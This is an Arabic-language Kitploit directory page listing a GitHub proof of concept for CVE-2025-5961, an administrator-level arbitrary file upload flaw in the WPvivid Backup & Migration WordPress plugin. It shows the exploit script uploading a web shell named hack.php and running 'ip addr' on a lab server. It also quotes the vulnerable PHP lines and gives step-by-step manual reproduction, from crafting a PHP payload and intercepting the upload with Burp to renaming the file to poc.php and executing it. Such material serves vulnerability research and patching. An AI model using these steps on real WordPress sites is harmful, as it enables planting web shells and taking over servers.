Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-5961 — الترحيل، النسخ الاحتياطي، التجهيز – WPvivid Backup & Migration <= 0.9.116 - مصادق (مسؤول+) رفع ملف عشوائي | Kitploit
أدوات/GitHubGitHub/d0n601/cve-2025-5961
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubd0n601/cve-2025-5961

CVE-2025-5961

الترحيل، النسخ الاحتياطي، التجهيز – WPvivid Backup & Migration <= 0.9.116 - مصادق (مسؤول+) رفع ملف عشوائي

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-5961

الترحيل والنسخ الاحتياطي والمراحل – WPvivid Backup & Migration <= 0.9.116 - رفع ملفات تعسفية للمستخدمين المُوثقين (مسؤول أو أعلى)

لا يقوم إضافة wpvivid-backuprestore بتطهير أنواع الملفات في إجراء wpvivid_upload_import_files، مما يسمح للمسؤولين أو من هم أعلى منهم برفع ملفات تعسفية وربما الحصول على تنفيذ التعليمات البرمجية على الخادم. ملاحظة: يمكن الوصول إلى الملفات المرفوعة فقط في حالات WordPress التي تعمل على خادم الويب NGINX لأن ملف .htaccess الموجود في مجلد رفع الملفات المستهدف يمنع الوصول على خوادم Apache.

ملخص الاستغلالات

  • يتم توفير إثبات المفهوم CVE-2025-5961.py لتوضيح قيام مسؤول برفع غلاف ويب باسم hack.php.
root@kitploit:~
 python3 ./CVE-2025-5961.py https://lab1.hacker admin password
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
ajax_nonce: e4d4bec9f0
Uploading web shell: hack.php
{"result":"success"}

Web Shell At: https://lab1.hacker/wp-content/wpvividbackups/ImportandExport/hack.php

Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 78309sec preferred_lft 78309sec
    inet6 fd00::a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86105sec preferred_lft 14105sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:63:2d:a4:f2 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

التفاصيل

يستدعي إجراء wpvivid_upload_import_files الدالة upload_files في السطر 2210 من /wp-content/plugins/wpvivid-backuprestore/includes/class-wpvivid-export-import.php دون فرض أي تحقق من نوع الملف.

في السطر 2235 يتم تعيين $file_name على النحو التالي:

root@kitploit:~
$file_name=basename(sanitize_text_field($_POST['name']));

ثم يتم استخدام المتغير $file_name في السطر 2246 لكتابة الملف إلى نظام الملفات.

root@kitploit:~
$file_handle = fopen($path.$file_name, 'wb');

إعادة الإنتاج يدويًا

  1. أنشئ ملفًا ضارًا لتجاوز التحقق من الواجهة الأمامية نظرًا لأننا نقوم بذلك يدويًا. أدخل هذا الأمر في الطرفية:
root@kitploit:~
echo "<?php phpinfo(); ?>" >>  wpvivid-0000000000000_1969-04-20-00-00_export_post.zip
  1. سجل الدخول إلى لوحة التحكم وانتقل إلى علامة التبويب WPvivid Backup.
  2. اختر خيار Export & Import من القائمة الجانبية، ثم اختر علامة التبويب Import.
  3. ابدأ تشغيل Burp Suite أو أداة مشابهة وابدأ في اعتراض حركة المرور.
  4. انقر فوق زر Upload and Import، واختر الملف wpvivid-0000000000000_1969-04-20-00-00_export_post.zip الذي أنشأناه في الخطوة صفر. test1
  5. سيحتوي طلب POST الأول على شيء مثل ما يلي، قم بإعادة توجيه هذا الطلب:
root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
...
...
...
action=wpvivid_check_import_file&file_name=wpvivid-0000000000000_1969-04-20-00-00_export_post.zip&nonce=5c83c6b97b
  1. قم بتعديل الطلب التالي الذي يحتوي على بيانات النموذج لتعيين اسم الملف إلى poc.php: test2
  2. انتقل إلى https://THEWEBSITE.com/wp-content/wpvividbackups/ImportandExport/poc.php لتنفيذ إثبات المفهوم. test3
تنزيل الأداة